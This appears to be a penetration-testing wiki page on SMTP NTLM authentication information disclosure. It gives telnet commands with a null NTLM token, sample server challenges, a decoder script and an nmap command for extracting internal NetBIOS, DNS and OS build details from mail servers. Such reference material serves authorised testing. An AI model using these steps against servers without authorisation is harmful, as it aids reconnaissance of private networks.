📖

SMTP NTLM Auth information disclosure

Formula

Group

NetworkPentest

Keywords

MailNTLMWindowsActive Directory

Last edited time

Sep 3, 2023 11:44 PM

Slug

Title

🔗 Related
👉 Overview
👀 What ?
🧐 Why ?
⛏️ How ?
⚙️ Exploitation
Manual
NMAP
🖇️ References

🔗 Related

📖SMTP

NTLM

👉 Overview

👀 What ?

SMTP NTLM authentication information disclosure refers to the exploitation of vulnerabilities in the NTLM authentication process to extract sensitive internal information.

🧐 Why ?

SMTP NTLM authentication information disclosure presents an enticing opportunity to gain access to sensitive internal information. By exploiting vulnerabilities in the NTLM authentication process, you can gather details about the server, such as NetBIOS, DNS, and OS build version information. This valuable information allows you to identify potential targets, understand internal naming conventions, determine end-of-life operating systems, and discover internal DNS names.

⛏️ How ?

To exploit SMTP NTLM authentication information disclosure, you can initiate a connection and send anonymous (null) credentials to the target server. This will prompt the server to respond with an NTLM Type 2 challenge response, which you can decode to unveil critical internal information.

⚙️ Exploitation

To perform SMTP NTLM authentication information disclosure, you can follow these manual steps or use NMAP to automate the process.

Manual

Start by establishing a Telnet connection to the SMTP server:

telnet example.com 587

Greet the SMTP server using the HELO command:

HELO

Initiate the NTLM authentication process:

AUTH NTLM

Submit an anonymous (null) credentials by providing the following code:

TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA=

Here's an example of the complete manual command execution:

root@kali: telnet example.com 587 
220 example.com SMTP Server Banner 
>> HELO 
250 example.com Hello [x.x.x.x] 
>> AUTH NTLM
334 NTLM supported 
>> TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA= 
334 TlRMTVNTUAACAAAACgAKADgAAAAFgooCBqqVKFrKPCMAAAAAAAAAAEgASABCAAAABgOAJQAAAA9JAEkAUwAwADEAAgAKAEkASQBTADAAMQABAAoASQBJAFMAMAAxAAQACgBJAEkAUwAwADEAAwAKAEkASQBTADAAMQAHAAgAHwMI0VPy1QEAAAAA

You need then to decode the challenge receive

You can use a dedicated script :

https://github.com/Cyber-Courses/NTLM-Challenge-Decoder

git clone https://github.com/Cyber-Courses/NTLM-Challenge-Decoder.git
cd NTLM-Challenge-Decoder
python3 ntlm_challenge_decoder.py "TlRMTVNTUAACAAAADgAOADgAAAAFgomiATnkfKRMCOEAAAAAAAAAAJYAlgBGAAAABgOAJQAAAA9UAEsAQQAuAEMATwBNAAIADgBUAEsAQQAuAEMATwBNAAEAHAAyAEsAMQAyAFMASABBAFIARQBQAE8ASQBOAFQABAAOAHQAawBhAC4AYwBvAG0AAwAsADIASwAxADIAUwBIAEEAUgBFAFAATwBJAE4AVAAuAHQAawBhAC4AYwBvAG0ABQAOAHQAawBhAC4AYwBvAG0ABwAIAMUyAfUe0dMBAAAAAA=="

Or using the ntlm-challenge-decoder Burp pluggin :

https://github.com/PortSwigger/ntlm-challenge-decoder

NMAP

You can also use NMAP with the following command to automate the process:

nmap --script=smtp-ntlm-info --script-timeout=60s example.com

In this command, NMAP will execute the smtp-ntlm-info script against the target host, prioritizing open ports. This script scans for the SMTP NTLM authentication information disclosure vulnerability.